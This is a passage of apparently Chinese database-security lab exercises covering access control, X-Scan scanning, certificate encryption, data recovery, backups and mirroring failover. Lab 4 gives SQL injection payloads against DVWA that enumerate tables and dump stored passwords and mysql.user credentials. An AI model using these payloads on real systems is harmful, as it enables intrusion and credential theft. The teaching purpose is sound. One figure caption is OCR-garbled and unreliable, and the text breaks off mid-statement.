數(shù)據(jù)安全 專題實(shí)訓(xùn) 1.8.1

1·實(shí)訓(xùn)目的【實(shí)訓(xùn)1】基于視圖的訪問控制（1）掌握視圖的定義與使用方法。(2）了解視圖在訪問控制中的作用。注意：下面的任務(wù)采用的數(shù)據(jù)庫以SQLServer數(shù)據(jù)庫為例。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/tqeyuv35/challenges2·實(shí)訓(xùn)任務(wù)任務(wù)1【隱藏查詢的復(fù)雜過程】創(chuàng)建一個(gè)視圖V_ItemCount，用于查詢銷售訂單中每個(gè)物料的訂貨數(shù)量。結(jié)果寫于下方任務(wù)2【基于視圖的簡單查詢】查詢銷售訂單中物料編號(hào)為10001的物料的訂貨數(shù)量。結(jié)果寫于下方任務(wù)3【查詢所有列權(quán)限】授予用戶Userl查詢物料表的權(quán)限。結(jié)果寫于下方任務(wù)4【視圖的安全性控制1一可見列控制】創(chuàng)建一個(gè)視圖V_Item，用于查詢所有物料的信息（顯示列：物料編號(hào)、物料名稱、物料類創(chuàng)建日期、創(chuàng)建人），然后授予用戶User1只能查詢物料表中物料名稱和物料編號(hào)的權(quán)限。別、結(jié)果寫于下方任務(wù)5【視圖的安全性控制2一可見行控制】創(chuàng)建一個(gè)視圖V_Item_Mine，用于查詢當(dāng)前用戶創(chuàng)建的所有物料的信息（顯示列：物料編號(hào)、物料名稱、物料類別、創(chuàng)建日期、創(chuàng)建人），然后授予每個(gè)用戶查詢物料表的權(quán)限且每個(gè)用戶只能看到自己創(chuàng)建的物料信息。結(jié)果寫于下方3·拓展任務(wù)任務(wù)1【創(chuàng)建視圖并授權(quán)】在產(chǎn)品銷售數(shù)據(jù)庫中創(chuàng)建成本小于1000元的產(chǎn)品的產(chǎn)品視圖V_CP_PRICE1000，授予用戶Userl查詢產(chǎn)品視圖V_CP_PRICE1000的權(quán)限結(jié)果寫于下方任務(wù)2【查詢視圖】基于V_CP_PRICE1000視圖，查詢價(jià)格小于1000元的產(chǎn)品的產(chǎn)品編號(hào)、名稱和價(jià)格。結(jié)果寫于下方任務(wù)3【加密視圖與更新視圖】利用T-SQL語句進(jìn)行加密并保證對該視圖的更新都符合成本小于1000元這個(gè)條件。對視圖VIEW_CP_PRICE2000進(jìn)行以下數(shù)據(jù)更新。（1）插入一條產(chǎn)品記錄（100082，數(shù)碼相機(jī)，500）。（2）將產(chǎn)品編號(hào)為100082的成本改為1500元。（3）刪除產(chǎn)品編號(hào)為100082的產(chǎn)品。結(jié)果寫于下方1·實(shí)訓(xùn)目的【實(shí)訓(xùn)2】基于角色的訪問控制（1）掌握SQLServer身份驗(yàn)證模式。（2）掌握創(chuàng)建登錄賬戶、數(shù)據(jù)庫用戶的方法。（3）掌握使用角色實(shí)現(xiàn)數(shù)據(jù)庫安全性的方法。（4）掌握權(quán)限的分配。（5）學(xué)會(huì)運(yùn)用T-SQL語句進(jìn)行權(quán)限管理。（6）理解SQLSever數(shù)據(jù)庫的安全機(jī)制。注意：下面的任務(wù)采用的數(shù)據(jù)庫以SQLServer數(shù)據(jù)庫為例?？梢暬媒貓D方式、T-SQL語句用復(fù)制粘貼方式將內(nèi)容寫于對應(yīng)的位置。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/r8y9pbcm/challenges2·實(shí)訓(xùn)任務(wù)任務(wù)1【創(chuàng)建登錄名、服務(wù)器角色】（1）用可視化創(chuàng)建Windows身份模式的登錄名w_userl。（2）用T-SQL語句創(chuàng)建Windows身份模式的登錄名W_user2。（3）用可視化創(chuàng)建混合身份模式的登錄名sql_userl。（4）用T-SQL語句創(chuàng)建混合身份模式的登錄名sql_user2。（5）用可視化創(chuàng)建服務(wù)器角色serverl。（6）用T-SQL語句創(chuàng)建服務(wù)器角色server2。結(jié)果寫于下方任務(wù)2（創(chuàng)建數(shù)據(jù)庫用戶及角色）（1）用可視化創(chuàng)建銷售數(shù)據(jù)庫用戶myuserl（登錄名為sql_user1）。（2）用T-SQL語句創(chuàng)建銷售數(shù)據(jù)庫用戶myuser2（登錄名為sql_user2）。（3）用可視化將myuserl用戶添加到固定數(shù)據(jù)庫角色db_owner中。（4）用T-SQL語句將myuser2用戶添加到固定數(shù)據(jù)庫角色db_owner中。（5）用可視化創(chuàng)建自定義數(shù)據(jù)庫角色myrolel。（6）用T-SQL語句創(chuàng)建自定義數(shù)據(jù)庫角色myrole2。結(jié)果寫于下方任務(wù)3【權(quán)限管理】（1）以sa用戶身份登錄，創(chuàng)建一個(gè)數(shù)據(jù)庫，數(shù)據(jù)庫名為DB1，并在該數(shù)據(jù)庫中創(chuàng)建個(gè)學(xué)生表（包含學(xué)號(hào)、姓名、性別、年齡、所在系）。結(jié)果寫于下方（2）以sa用戶身份登錄，創(chuàng)建一個(gè)登錄（Login），登錄名為Loginl，密碼為123456。以登錄名Login1登錄，查看可訪問的數(shù)據(jù)庫情況并記錄。結(jié)果寫于下方（3）以sa用戶身份登錄，在DB1數(shù)據(jù)庫中創(chuàng)建數(shù)據(jù)庫用戶weng，使weng用戶能夠用登錄名Loginl登錄，并成為DB1數(shù)據(jù)庫的用戶。再次以登錄名Loginl登錄，查看可訪問的數(shù)據(jù)庫情況并記錄。請?jiān)诓樵兎治銎髦袌?zhí)行如下SQL語句，查看并記錄結(jié)果。①select*from學(xué)生表。②用SQL語句在學(xué)生表中插入一條記錄如下。createtable課程表(課號(hào)char(10)primarykey課程名稱char(30)notnull,學(xué)分smallintnotnull）結(jié)果寫于下方（4）以sa用戶身份登錄，用SQL語句授予weng用戶創(chuàng)建表的權(quán)限，查詢學(xué)生表的權(quán)限，向?qū)W生表中插入、更新、刪除記錄的權(quán)限。結(jié)果寫于下方（5）重新執(zhí)行步驟3中的SQL語句，查看并記錄結(jié)果。結(jié)果寫于下方（6）以sa用戶身份登錄，用SQL語句收回weng用戶創(chuàng)建表的權(quán)限，查詢學(xué)生表的權(quán)限，向?qū)W生表中插入、更新、刪除記錄的權(quán)限。結(jié)果寫于下方（7）重新執(zhí)行步驟3中的SQL語句，查看并記錄結(jié)果。結(jié)果寫于下方3·拓展任務(wù)任務(wù)1【登錄授權(quán)與訪問控制】創(chuàng)建兩個(gè)登錄，登錄名分別為userl、user2，密碼分別為userl、user2，并使它們都能訪問DB1數(shù)據(jù)庫。以sa用戶的身份使用查詢分析器連接數(shù)據(jù)庫，并選擇DB1數(shù)據(jù)庫，用SQL語句將學(xué)生表的所有權(quán)限賦予userl用戶，將課程表的所有權(quán)限賦予user2用戶。新建兩個(gè)查詢分析器窗口，分別以userl和user2用戶身份連接DB1數(shù)據(jù)庫，分別對學(xué)生表和課程表進(jìn)行操作，查看并記錄結(jié)果。結(jié)果寫于下方任務(wù)2【登錄授權(quán)與訪問控制】創(chuàng)建4個(gè)登錄，登錄名分別為user3、user4、user5、user6，密碼分別為user3、user4、user5、user6，并使它們都能訪問DB1數(shù)據(jù)庫。以sa用戶的身份使用查詢分析器連接數(shù)據(jù)庫，并選擇DB1數(shù)據(jù)庫，用SQL語句將學(xué)生表的所有權(quán)限賦予user3用戶，并允許其將權(quán)限授予其他用戶，再用SQL語句將學(xué)生表的所有權(quán)限賦予user4用戶，但不允許其將權(quán)限授予其他用戶。新建兩個(gè)查詢分析器窗口，分別以user3和user4用戶身份連接DB1數(shù)據(jù)庫，在user3用戶的窗口中，將學(xué)生表的所有權(quán)限賦予user5用戶；在user4用戶的窗口中，將學(xué)生表的所有權(quán)限賦予user6用戶，查看并記錄結(jié)果。結(jié)果寫于下方1·實(shí)訓(xùn)目的【實(shí)訓(xùn)3】數(shù)據(jù)庫漏洞掃描（1）了解常見的可能出現(xiàn)漏洞的協(xié)議層。（2）了解協(xié)議層中常見的漏洞。（3）學(xué)會(huì)漏洞掃描常用的工具語言及協(xié)議層對應(yīng)的描述方式。（4）了解常見掃描報(bào)告的必需元素。2·實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】Windows操作系統(tǒng)、SQLServer數(shù)據(jù)庫、X-Scan軟件。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/c32mbgh8/challenges任務(wù)1【sa賬戶設(shè)置】打開SOLServer數(shù)據(jù)庫的管理界面，采用Windows身份驗(yàn)證模式連接到服務(wù)器，修改sa用戶權(quán)限為啟用狀態(tài)并將其密碼修改為abc123。重新使用sa用戶身份登錄到服務(wù)器。結(jié)果寫于下方任務(wù)2【X-Scan掃描參數(shù)設(shè)置并掃描）打開X-Scan軟件并設(shè)置掃描參數(shù)，對遠(yuǎn)程主機(jī)的數(shù)據(jù)庫進(jìn)行漏洞掃描。其中的IP地址為數(shù)據(jù)庫服務(wù)器主機(jī)的IP地址，其他選項(xiàng)采用默認(rèn)設(shè)置即可。查看掃描結(jié)果，可以發(fā)現(xiàn)數(shù)據(jù)庫服務(wù)器主機(jī)存在弱口令的安全漏洞問題，結(jié)果寫于下方任務(wù)3【修改密碼復(fù)雜度后掃描】再次修改sa用戶的密碼，此時(shí)應(yīng)該設(shè)置盡可能復(fù)雜的密碼，然后運(yùn)行X-Scan掃描軟件，進(jìn)行目標(biāo)主機(jī)的數(shù)據(jù)庫漏洞掃描。查看并記錄掃描結(jié)果。實(shí)訓(xùn)結(jié)果寫于下方3·拓展任務(wù)任務(wù)【掃描報(bào)告與安全性分析】嘗試使用不同類型的數(shù)據(jù)庫主機(jī)進(jìn)行掃描，并通過查詢掃描報(bào)告分析不同的數(shù)據(jù)庫的安全性。實(shí)訓(xùn)結(jié)果寫于下方1·實(shí)訓(xùn)目的【實(shí)訓(xùn)4】數(shù)據(jù)庫SQL注入漏洞（1）了解SQL注入漏洞的類型。(2）了解視圖在訪問控制中的作用。注意：下面的任務(wù)采用的數(shù)據(jù)庫以MySQL數(shù)據(jù)庫為例。2·實(shí)訓(xùn)任務(wù)實(shí)訓(xùn)描述：在dvwa環(huán)境安全級(jí)別為low的前提下進(jìn)行SQL注入攻擊，并利用之前章節(jié)中提到的注入技巧進(jìn)行注入攻擊，獲取更多有關(guān)數(shù)據(jù)庫的信息。【實(shí)訓(xùn)環(huán)境說明】dvwa環(huán)境、MySQL數(shù)據(jù)庫。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/zj3hf2x5/challenges任務(wù)1【獲取dvwa環(huán)境】搭建dvwa環(huán)境，包括搭建phpstudy服務(wù)；部署dvwa服務(wù)；訪問dvwa主頁。結(jié)果寫于下方任務(wù)2【判斷存在的SQL注入漏洞類型】判斷安全級(jí)別為medium的前提下，所存在的SQL注入漏洞類型。提示：可以嘗試使用“1'or1=1#”與“1or1=1#"來判斷所存在的SQL注入漏洞類型，結(jié)果寫于下方任務(wù)3【獲取數(shù)據(jù)庫的名稱、賬戶名、版本及操作系統(tǒng)信息】獲取數(shù)據(jù)庫的名稱、賬戶名、版本及操作系統(tǒng)信息。提示：利用UNION查詢并結(jié)合MySQL數(shù)據(jù)庫的內(nèi)置函數(shù)userO、databaseO、versionO，獲取數(shù)據(jù)庫信息。例如，使用下列注入語句獲取數(shù)據(jù)庫名稱、賬戶名。1'unionselectuser(),database()#結(jié)果寫于下方任務(wù)4【獲取數(shù)據(jù)庫的表名、列名】利用MySQL的視圖，如INFORMATION_SCHEMA.TABLES和INFORMATION_SCHEMACONLUMNS獲取數(shù)據(jù)庫的表名、列名。例如，使用下列注入語句獲取數(shù)據(jù)庫的表名。1'unionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()#結(jié)果寫于下方任務(wù)5【獲取數(shù)據(jù)庫的用戶名和密碼】獲取數(shù)據(jù)庫的用戶名和密碼，并利用聯(lián)合查詢注入1'orl=lunionselectgroup_concat(user_id,first_name,last_name),group_concat(password)fromusers#結(jié)果寫于下方任務(wù)6【猜測root用戶】利用mysql.user，猜測root用戶。1'unionselectl,group_concat(user,password)frommysql.user#結(jié)果寫于下方3·拓展任務(wù)任務(wù)【思考】根據(jù)上述實(shí)訓(xùn)過程，請思考并分析，如何能夠防御SQL注入攻擊？目前常用的預(yù)防方式有哪些？結(jié)果寫于下方1·實(shí)訓(xùn)目的【實(shí)訓(xùn)5】數(shù)據(jù)庫數(shù)據(jù)的加密（1）了解使用證書加密數(shù)據(jù)的方法。（2）了解使用證書解密數(shù)據(jù)的方法。注意：下面的任務(wù)采用的數(shù)據(jù)庫以SOLServer數(shù)據(jù)庫為例，實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/q8hbnf9f/challenges2·實(shí)訓(xùn)任務(wù)任務(wù)1【使用證書加密數(shù)據(jù)】創(chuàng)建數(shù)據(jù)庫TestDB1，創(chuàng)建測試表tb(id,data)，其中id字段為自增長列，data字段為要加密的列，數(shù)據(jù)類型為varbinary，因?yàn)榧用芎蟮臄?shù)據(jù)是二進(jìn)制數(shù)據(jù)。結(jié)果寫于下方任務(wù)2【創(chuàng)建并使用數(shù)據(jù)庫主密鑰】創(chuàng)建數(shù)據(jù)庫主密鑰的語句為CREATEMASTERKEYENCRYPTIONBYPASSWORD='abc123'；使用數(shù)據(jù)庫主密鑰的語句為OPENMASTERKEYDECRYPTIONBYPASSWORD='abc123。結(jié)果寫于下方任務(wù)3【用密碼創(chuàng)建證書】用密碼abc123創(chuàng)建證書Certl。START_DATE為當(dāng)前系統(tǒng)日期，有效期為一年。結(jié)果寫于下方任務(wù)4【向測試表中寫入一條測試數(shù)據(jù)】向測試表中寫入一條測試數(shù)據(jù)。提示：使用EncryptByCertO方法寫入證書內(nèi)容，然后查看測試表中的數(shù)據(jù)。結(jié)果寫于下方任務(wù)5【提取加密后的數(shù)據(jù)】提取加密后的數(shù)據(jù)。提示：使用castO方法進(jìn)行數(shù)據(jù)轉(zhuǎn)換，再使用DecryptByCertO方法進(jìn)行解密。結(jié)果寫于下方1·實(shí)訓(xùn)目的【實(shí)訓(xùn)l6】EasyRecovery數(shù)據(jù)恢復(fù)實(shí)踐（1）了解電磁泄漏現(xiàn)象所引起的數(shù)據(jù)恢復(fù)。（2）掌握針對硬件損壞、文件刪除等實(shí)現(xiàn)數(shù)據(jù)恢復(fù)。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/bgpymzwk/challenges2·實(shí)訓(xùn)任務(wù)案例描述：某員工在使用計(jì)算機(jī)的過程中，不小心刪除了一些有用的文件，并且清空了回收站，該員工急需辦法恢復(fù)被刪除的文件。計(jì)算機(jī)磁盤屬于磁介質(zhì)，所有磁介質(zhì)都存在剩磁效應(yīng)的問題，保存在磁介質(zhì)中的信息會(huì)使磁介質(zhì)呈現(xiàn)不同程度的永久性磁化，因此在磁介質(zhì)上記載的信息在一定程度上是無法徹底刪除的。通過一定的技術(shù)手段可以將已刪除信息的磁盤上的原有信息提取出來。另外，由于計(jì)算機(jī)文件系統(tǒng)的實(shí)現(xiàn)原理，文件刪除操作并沒有將文件的數(shù)據(jù)內(nèi)容從磁盤上刪除，因此通過一定的技術(shù)手段可以將刪除的文件恢復(fù)。通過該案例，使我們認(rèn)識(shí)到電磁泄漏現(xiàn)象所引起的數(shù)據(jù)恢復(fù)，以及針對硬件損壞、文件刪除等實(shí)現(xiàn)數(shù)據(jù)恢復(fù)的內(nèi)容。要求：理解磁盤數(shù)據(jù)恢復(fù)的原理，認(rèn)識(shí)數(shù)據(jù)恢復(fù)技術(shù)對信息安全的影響。能夠使用數(shù)據(jù)恢復(fù)軟件EasyRecovery進(jìn)行文件恢復(fù)。提高要求：能夠?qū)Υ疟P數(shù)據(jù)進(jìn)行徹底刪除。任務(wù)1【知識(shí)積累】請分別對誤操作類、病毒破壞類、軟件破壞類、硬件故障類進(jìn)行舉例。結(jié)果寫于下方任務(wù)2【徹底刪除文件的方法】請列出幾種可以徹底刪除文件的方法。結(jié)果寫于下方任務(wù)3【數(shù)據(jù)恢復(fù)軟件EasyRecovery】EasyRecovery軟件是世界著名數(shù)據(jù)恢復(fù)公司Ontrack的杰作。其Professional版本更是包括了磁盤診斷、數(shù)據(jù)恢復(fù)、文件修復(fù)、E-mail修復(fù)等4類共19個(gè)項(xiàng)目的各種數(shù)據(jù)文件修復(fù)和磁盤診斷方案。本次使用的是EasyRecoveryProfessional。EasyRecovery軟件在修復(fù)過程中不會(huì)對原始數(shù)據(jù)進(jìn)行改動(dòng)，只通過以讀的形式處理需要修復(fù)的分區(qū)。它不會(huì)將任何數(shù)據(jù)寫入正在處理的分區(qū)。EasyRecovery還包括一個(gè)實(shí)用程序，用于創(chuàng)建緊急啟動(dòng)軟盤，以便用戶在不能進(jìn)入Windows操作系統(tǒng)時(shí)可以在DOS下修復(fù)數(shù)據(jù)。EasyRecovery軟件修復(fù)范圍：修復(fù)主引導(dǎo)扇區(qū)（MBR）、修復(fù)BIOS參數(shù)塊（BPB）、修復(fù)分區(qū)表、修復(fù)文件分配表（FAT）或主文件表（MFT）、修復(fù)根目錄。具體步驟如下步驟1：（1）安裝并運(yùn)行數(shù)據(jù)恢復(fù)軟件EasyRecovery。(2）創(chuàng)建文件"我的文件.txt，內(nèi)容為“密碼：abc123”，并將其復(fù)制到U盤，然后刪除該文件。（3）啟動(dòng)數(shù)據(jù)恢復(fù)軟件EasyRecovery。（4）選擇DataRecovery選項(xiàng)，并選擇DeletedRecovery選項(xiàng)。（5）在出現(xiàn)的對話框中選擇U盤的分區(qū)（即選擇要掃描的卷），并在FileFilter文本框中輸入*.txt，單擊Next按鈕。提示：恢復(fù)被誤刪除的文件的注意事項(xiàng)。注意事項(xiàng)一：用戶可選擇窗口左側(cè)的"NTFS已刪除”選項(xiàng)，查看所有已刪除文件，從而尋找目標(biāo)文件。注意事項(xiàng)二：用戶可在窗口右上角的文本框中輸入目標(biāo)文件格式，單擊"搜索”按鈕縮小搜尋范圍。輸入doc再單擊搜索“按鈕，文件列表便只展示doc文件了。注意事項(xiàng)三：用戶可單擊"修改日期"按鈕，使文件按照刪除日期有序地顯示。（6）搜索完畢后，已刪除文件將以列表的形式展現(xiàn)。在出現(xiàn)的對話框中選擇要恢復(fù)的文件“我的文件.txt，并單擊Next按鈕，選擇保存恢復(fù)文件的文件夾，如“我的文檔”提示：不能將已刪除的文件保存到所掃描的磁盤中。（7）單擊一系列Next按鈕，完成文件恢復(fù)。（8）打開“我的文檔”文件夾，發(fā)現(xiàn)存在文件“密件.txt"，打開該文件并確認(rèn)文件內(nèi)容3·拓展任務(wù)任務(wù)【思考】為什么刪除的磁盤文件能夠恢復(fù)？怎樣才能徹底地刪除文件？1·實(shí)訓(xùn)目的【實(shí)訓(xùn)7】數(shù)據(jù)誤操作恢復(fù)案例（1）了解避免數(shù)據(jù)誤刪除的備份策略。（2）掌握故障的分析方法及安全方案的設(shè)計(jì)。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/48capu9w/challenges2·實(shí)訓(xùn)任務(wù)案例描述：某一公司的數(shù)據(jù)庫管理員在編寫SQL刪除語句時(shí)，將Where條件書寫錯(cuò)誤，導(dǎo)致系統(tǒng)中一張重要表的大約幾萬條記錄被誤刪除。直到第二天，他才發(fā)現(xiàn)自已犯了這個(gè)大錯(cuò)誤，但是在進(jìn)行上述誤操作后，系統(tǒng)進(jìn)行了數(shù)據(jù)庫完整備份，也就是說，昨天的備份已經(jīng)被新的完整備份取代了，即已經(jīng)沒有誤操作之前的全庫備份了。任務(wù)1【事前諸葛】為了避免發(fā)生上述情況，應(yīng)采用什么樣的備份策略呢？提示：可以從什么時(shí)間用完整備份、什么時(shí)間用差異備份、什么時(shí)間用日志備份等方面進(jìn)行討論。結(jié)果寫于下方任務(wù)2【事后諸葛】應(yīng)如何恢復(fù)這些被刪除的記錄呢？提示：針對這種記錄被誤刪除的情況，如果有歷史的完整備份，則可以新建一個(gè)數(shù)據(jù)庫，將原來備份的數(shù)據(jù)庫恢復(fù)，再將記錄插入被誤刪除的表中，如果沒有之前的完整備份，則只能通過日志來恢復(fù)。結(jié)果寫于下方任務(wù)3【制定解決方案】根據(jù)對故障的分析和對任務(wù)資料的查詢，制訂初步的問題解決方案。提示：分別從備份策略的制定原則、設(shè)計(jì)、示例進(jìn)行說明。（1）制定備份原則。結(jié)果寫于下方提示：原則一：數(shù)據(jù)庫備份應(yīng)保障在數(shù)據(jù)丟失的情況下能夠恢復(fù)重要數(shù)據(jù)。因此，在數(shù)據(jù)庫中的數(shù)據(jù)發(fā)生變化后，要及時(shí)對重要的數(shù)據(jù)進(jìn)行備份。原則二：數(shù)據(jù)備份不能影響業(yè)務(wù)處理的正常進(jìn)行，應(yīng)將這類占用服務(wù)資源高的完全備份設(shè)置在業(yè)務(wù)處理的空閑時(shí)間段進(jìn)行，但是應(yīng)將日志備份設(shè)置在業(yè)務(wù)處理的高峰期進(jìn)行。原則三：對于重要的數(shù)據(jù)，應(yīng)將數(shù)據(jù)備份到多種介質(zhì)和多個(gè)地方，這樣即使一處備份損壞了，還有其他的備份可用。制定原則：（2）備份策略設(shè)計(jì)。提示：備份策略包括數(shù)據(jù)庫完整備份策略、數(shù)據(jù)庫和事務(wù)日志備份策略、數(shù)據(jù)庫差異備份策略、數(shù)據(jù)庫文件或文件組備份策略等。用戶應(yīng)根據(jù)情況進(jìn)行設(shè)計(jì)。結(jié)果寫于下方（3）備份策略示例。示例如下星期日：凌晨2:00執(zhí)行數(shù)據(jù)庫完整備份星期一、二、三、四、五、六凌晨2:00執(zhí)行數(shù)據(jù)庫差異備份、其余時(shí)間則每隔半小時(shí)執(zhí)行日志備份截?cái)嗍聞?wù)日志每個(gè)星期的每一天都單獨(dú)保留相應(yīng)的備份。3·拓展任務(wù)任務(wù)【還原誤刪除內(nèi)容并恢復(fù)數(shù)據(jù)】圖2-19所示為還原誤刪除內(nèi)容并恢復(fù)數(shù)據(jù)的7個(gè)步驟，請按照步驟完成相應(yīng)的內(nèi)容，實(shí)現(xiàn)誤刪除內(nèi)容的還原，并利用備份和還原技術(shù)恢復(fù)數(shù)據(jù)。步準(zhǔn)1：創(chuàng)建測試教據(jù)庫TEST步賽2：創(chuàng)建測試表，并尚表中據(jù)入兩條記錄步我：在新建消中取當(dāng)前服務(wù)器的時(shí)間步算：制除記票步雅：完整備份、差異備份、日志備份步意6：時(shí)點(diǎn)還哦步強(qiáng)？：檢壹記要圖2-19還原誤刪除內(nèi)容并恢復(fù)數(shù)據(jù)的7個(gè)步驟1·實(shí)訓(xùn)目的【實(shí)訓(xùn)8】數(shù)據(jù)庫鏡像容災(zāi)模擬故障演練（1）了解數(shù)據(jù)庫鏡像容災(zāi)的配置。（2）掌握故障的分析方法及安全方案的設(shè)計(jì)。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/g9eac3tu/challenges2·實(shí)訓(xùn)任務(wù)任務(wù)1【鏡像容災(zāi)方法1】案例描述：數(shù)據(jù)庫服務(wù)器HIS的A群集為主服務(wù)器，數(shù)據(jù)流通過鏡像傳向B機(jī)（單臺(tái)服務(wù)器），但是無法連接上HIS服務(wù)器，經(jīng)檢查后發(fā)現(xiàn)HIS服務(wù)器的數(shù)據(jù)庫連接數(shù)異常增加，死鎖頻繁，有幾個(gè)任務(wù)同時(shí)開啟導(dǎo)致并發(fā)數(shù)被大量占用，而關(guān)閉任務(wù)需要很長的回滾時(shí)間，因此決定切換為鏡像服務(wù)器B機(jī)。步驟1：單擊數(shù)據(jù)庫鏡像屬性頁中的“故障轉(zhuǎn)移”按鈕，此時(shí)數(shù)據(jù)庫會(huì)丟棄當(dāng)前未提交的事務(wù)，轉(zhuǎn)移到鏡像服務(wù)器上。步驟2：原來的鏡像庫處于“正在還原”狀態(tài)，故障轉(zhuǎn)移之后，將處于正常訪問狀態(tài)。步驟3：將B機(jī)的IP地址改為A群集的群集IP地址。（IP地址的切換可以利用WindoWSCluster進(jìn)行自動(dòng)切換，這樣效果更佳，鏡像就直接做在一個(gè)群集內(nèi)部的兩臺(tái)機(jī)器上。）步驟4：整個(gè)切換過程耗時(shí)6分鐘左右。在合適的時(shí)候，通過事務(wù)日志和增量備份還原的方法，將在B機(jī)上產(chǎn)生的事務(wù)和數(shù)據(jù)導(dǎo)入A群集中即可。注意：跨數(shù)據(jù)庫事務(wù)和分布式事務(wù)均不支持?jǐn)?shù)據(jù)庫鏡像。任務(wù)2【鏡像容災(zāi)方法2】案例描述：數(shù)據(jù)庫服務(wù)器HIS的A群集為主服務(wù)器，數(shù)據(jù)流通過鏡像傳向B機(jī)（單臺(tái)服務(wù)器），但是無法連接上HIS服務(wù)器，經(jīng)檢查后發(fā)現(xiàn)HIS服務(wù)器的群集硬件故障，藍(lán)屏且無法重啟，此時(shí)鏡像服務(wù)器B機(jī)處于“正在還原”狀態(tài)，必須將B機(jī)狀態(tài)切換到正常訪問狀態(tài)。步驟1：連接鏡像服務(wù)器B機(jī)，輸入SQL語句。usemasterrestoredatabasetestDBwithrecovery.步驟2：執(zhí)行SQL語句，將數(shù)據(jù)庫恢復(fù)為可以被訪問的狀態(tài)。步驟3：將B機(jī)的IP地址改為A群集的群集IP地址。（IP地址的切換可以利用WindoWsCluster進(jìn)行自動(dòng)切換，這樣效果更佳，鏡像就直接做在一個(gè)群集內(nèi)部的兩臺(tái)機(jī)器上。）步驟4：整個(gè)切換過程耗時(shí)4分鐘左右。在合適的時(shí)候，通過事務(wù)日志和增量備份還原的方法，將在B機(jī)上產(chǎn)生的事務(wù)和數(shù)據(jù)導(dǎo)入A群集中即可。注意：這種切換方式仍然會(huì)丟失尚未提交的事務(wù)，在前一種故障模擬場景中，也可以直接采用這種方式進(jìn)行容災(zāi)切換。3·拓展任務(wù)任務(wù)【幾種常見容災(zāi)方案的對比】請查閱相關(guān)資料，了解各種容災(zāi)方案的實(shí)際應(yīng)用案例或應(yīng)用場景說明。幾種常見容災(zāi)方案的對比如表2-1所示。表2-1幾種常見容災(zāi)方案的對比項(xiàng)目技術(shù)架構(gòu)硬件成本本/異地存儲(chǔ)可否不同服務(wù)器類型限制鏈路成本帶寬優(yōu)化項(xiàng)目數(shù)據(jù)壓縮加密功能對生產(chǎn)機(jī)性能影響支持隨時(shí)隨地的恢復(fù)演練多對一的異地容災(zāi)架構(gòu)后期操作維護(hù)對應(yīng)用容災(zāi)的支持總體投資陣列型容災(zāi)基于存儲(chǔ)的硬件復(fù)制需要采購存儲(chǔ)和同步軟件，成本高必須相同容災(zāi)中心可以無主機(jī)必須采用光纖專線，成本高無，對帶寬要求十分苛刻陣列型容災(zāi)無無影響恢復(fù)演練需要主機(jī)環(huán)境配合，步驟復(fù)雜無中等可以支持（應(yīng)用內(nèi)容復(fù)制）大DATAGUARDOracle自身容災(zāi)機(jī)制只需采購主機(jī)（存儲(chǔ)），成本低可以不同，甚至可以不用存儲(chǔ)容災(zāi)中心和主機(jī)房必須有同樣的硬件架構(gòu)和系統(tǒng)軟件的主機(jī)可采用以太網(wǎng)專線：成本低無，對帶寬要求較低DATAGUARD無較小的影響恢復(fù)演練需要主機(jī)環(huán)境配合，步驟復(fù)雜有中等不支持，需要另外設(shè)定同步策略小第三方數(shù)據(jù)庫復(fù)制日志復(fù)制技術(shù)需要采購第三方軟件可以不同無限制可采用以太網(wǎng)專線，成本低無，對帶寬要求較低第三方數(shù)據(jù)庫復(fù)制有較小的影響恢復(fù)演練需要主機(jī)環(huán)境配合，步驟復(fù)雜有簡單不支持大CDP容災(zāi)基于存儲(chǔ)網(wǎng)絡(luò)的數(shù)據(jù)復(fù)制需要采購CDP設(shè)備，成本高可以不同無限制可采用以太網(wǎng)專線，成本低特有精簡式傳輸技術(shù)續(xù)表CDP容災(zāi)有，可以保證數(shù)據(jù)傳輸過程中不被竊取影響極小，官方宣稱系統(tǒng)資源占用小于1%可以基于虛擬機(jī)環(huán)境進(jìn)行恢復(fù)演練，步驟簡單易行有簡單可以支持（應(yīng)用內(nèi)容復(fù)制）大【實(shí)訓(xùn)9】誤操作數(shù)據(jù)庫恢復(fù)方法（日志尾部備份）1·實(shí)訓(xùn)目的（1）了解避免數(shù)據(jù)誤刪除的日志尾部備份策略。（2）掌握故障的分析方法及安全方案的設(shè)計(jì)。實(shí)驗(yàn)平臺(tái)環(huán)境鏈接：/shixuns/nb5vauz7/challenges2·實(shí)訓(xùn)任務(wù)案例描述：經(jīng)常會(huì)有人誤刪數(shù)據(jù)，或者誤操作，特別是在進(jìn)行修改和刪除操作時(shí)沒有添加Where子句，這將產(chǎn)生數(shù)據(jù)被刪除的風(fēng)險(xiǎn)。本次實(shí)訓(xùn)將使用日志尾部備份的方式對數(shù)據(jù)進(jìn)行恢復(fù)任務(wù)1【故障復(fù)現(xiàn)】步驟1：檢查數(shù)據(jù)庫的恢復(fù)模式，確?；謴?fù)模式為完整模式，或者利用如下腳本進(jìn)行檢查。SELEcTrecovery_model,recovery_model_descFROMsys.databasesWHEREname='AdventureWorks檢查結(jié)果如圖2-20所示。recovery_modelrecovery_model_descFULL圖2-20數(shù)據(jù)庫的恢復(fù)模式步驟2：至少為數(shù)據(jù)庫做一次完整備份。在創(chuàng)建完一個(gè)新數(shù)據(jù)庫后，建議甚至強(qiáng)制做一次完整備份?？梢杂萌缦耂QL語句檢查是否做過完整備份。SELEcTdatabase_name,recovery_model,nameFROMmsdb.dbo.backupset步驟3：首先創(chuàng)建一張表testTable，并插入一些數(shù)據(jù)。由于tempdb永遠(yuǎn)為簡單恢復(fù)模式，因此不適合作為案例。/*這里使用微軟的示例數(shù)據(jù)庫Adventureworks*USEAdventureworksGOIFOBJECT_ID（'testTable'）ISNOTNULLDROPTABLEtestTableGOCREATETABLEtestTableidINTIDENTITY(1,1)NAMEVARCHAR(50));步驟4：進(jìn)行一次刪除操作，利用WAITFOR命令準(zhǔn)確定位發(fā)生刪除的時(shí)間點(diǎn)。USEAdventureWorksGOWAITFORTIME‘17:45DELETEFROMdbo.testTab